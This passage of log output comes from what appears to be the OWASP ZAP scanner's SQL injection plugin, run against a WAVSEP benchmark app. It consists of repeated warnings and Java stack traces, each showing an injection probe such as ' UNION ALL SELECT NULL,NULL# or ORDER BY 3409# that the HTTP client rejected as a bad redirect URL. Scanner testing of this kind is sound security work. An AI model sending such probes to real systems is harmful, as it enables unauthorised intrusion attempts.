org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681918 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681919 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681919 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' ORDER BY 3409#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' ORDER BY 3409# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681920 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681920 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681921 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681921 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681922 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681923 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681924 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681924 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681925 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681925 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 